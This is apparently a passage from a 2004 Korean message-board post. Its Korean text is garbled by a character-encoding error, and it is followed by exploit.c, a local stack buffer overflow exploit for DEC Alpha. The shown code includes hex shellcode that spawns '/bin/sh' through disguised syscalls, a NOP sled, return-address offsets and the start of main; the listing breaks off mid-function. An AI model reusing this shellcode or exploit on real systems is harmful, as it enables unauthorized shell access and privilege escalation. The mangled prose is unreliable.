¾ßÇÕ´Ï´Ù. ±×°÷À» ã´ÂÀÏÀº ±×¸® ¾î·ÆÁö ¾Ê½À´Ï´Ù. ¸®ÅÏ ¾îµå·¹½º°¡ Àִ°÷Àº ÄÄÆÄÀÏÇÒ
¶§ Á¤ÇØÁö±â ¶§¹®ÀÔ´Ï´Ù.
exploit.c
----------------------------------------------------------------------------
#include<stdio.h>
#include<string.h>
#define OFFSET 0
#define ALIGN 3 /* 0, 1, 2, 3 */
#define RET_POSITION 1028 /* 0, 4, 8, 12, . . . */
#define NOP "\x1f\x04\xff\x47"
char shellcode[]=
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x11\x74\xf0\x47" /* bis $31,0x83,$17 */
"\x12\x14\x02\x42" /* addq $16,16,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\x12\x94\x09\x42" /* addq $16,76,$18 */
"\xfc\xff\x32\xb2" /* stl $17,-4($18) */
"\xff\x47\x3f\x26" /* ldah $17,0x47ff($31) */
"\x1f\x04\x31\x22" /* lda $17,0x041f($17) */
"\xfc\xff\x30\xb2" /* stl $17,-4($16) */
"\xf7\xff\x1f\xd2" /* bsr $16,-32 */
"\x10\x04\xff\x47" /* clr $16 */
"\x11\x14\xe3\x43" /* addq $31,24,$17 */
"\x20\x35\x20\x42" /* subq $17,1,$0 */
"\xff\xff\xff\xff" /* callsys ( disguised ) */
"\x30\x15\xd9\x43" /* subq $30,200,$16 */
"\x31\x15\xd8\x43" /* subq $30,192,$17 */
"\x12\x04\xff\x47" /* clr $18 */
"\x40\xff\x1e\xb6" /* stq $16,-192($30) */
"\x48\xff\xfe\xb7" /* stq $31,-184($30) */
"\x98\xff\x7f\x26" /* ldah $19,0xff98($31) */
"\xd0\x8c\x73\x22" /* lda $19,0x8cd0($19) */
"\x13\x05\xf3\x47" /* ornot $31,$19,$19 */
"\x3c\xff\x7e\xb2" /* stl $19,-196($30) */
"\x69\x6e\x7f\x26" /* ldah $19,0x6e69($31) */
"\x2f\x62\x73\x22" /* lda $19,0x622f($19) */
"\x38\xff\x7e\xb2" /* stl $19,-200($30) */
"\x13\x94\xe7\x43" /* addq $31,60,$19 */
"\x20\x35\x60\x42" /* subq $19,1,$0 */
"\xff\xff\xff\xff"; /* callsys ( disguised ) */
unsigned long get_sp(void)
{
__asm__("bis $31,$30,$0");
}
int main(int argc,char **argv)
{
char buff[RET_POSITION+8+ALIGN+1],*ptr;
char *nop;
|
Hit : 15332 Date : 2004/07/07 05:19
|
1581, 
4/80 
